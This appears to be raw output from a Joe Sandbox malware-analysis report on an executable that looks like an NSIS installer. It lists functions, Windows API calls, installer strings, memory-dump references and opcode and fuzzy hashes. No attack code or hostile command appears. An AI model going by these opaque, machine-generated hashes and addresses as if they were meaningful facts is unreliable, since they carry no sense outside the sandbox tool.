                                                                                                                                                                                                                                                                  • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                  Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                  • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                  • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                  • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                  • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                  Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                  • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                  Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                    • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                    • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                  • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                  • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                  • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                  • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                  Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                  • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                  • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                  • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                  Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00071600,00000064,0014B637), ref: 00403295
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                  • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                  • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                  Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                  • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                  • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                  • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                  • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                  Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                  • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                  Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                  • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                  • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                  • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                  Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                  • String ID:
